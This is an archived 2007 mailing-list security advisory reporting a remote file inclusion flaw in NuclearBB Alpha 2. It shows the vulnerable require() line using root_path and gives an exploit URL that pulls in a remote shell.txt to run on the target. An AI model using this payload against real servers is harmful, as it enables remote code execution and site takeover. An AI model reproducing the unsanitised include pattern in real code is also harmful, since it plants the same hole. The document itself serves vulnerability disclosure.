|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
NuclearBB Alpha 2 Remote File Inclusion
b14ck1c3
hotmail.com
Date: Tue Sep 11 2007 - 02:12:00 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Vuln Product: NuclearBB Alpha 2
Vendor: http://www.nuclearbb.com/
Vulnerability Type: Remote File Inclusion
Autor: Infection
Team: Rootshell Security Team
Vulnerable file: /NuclearBB/tasks/send_queued_emails.php
Exploit URL: http://localhost/NuclearBB/tasks/send_queued_emails.php?root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: root_path
Line number: 14
Lines:
----------------------------------------------
require("$root_path/inc/functions_email.php");
$mail = new email;
----------------------------------------------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]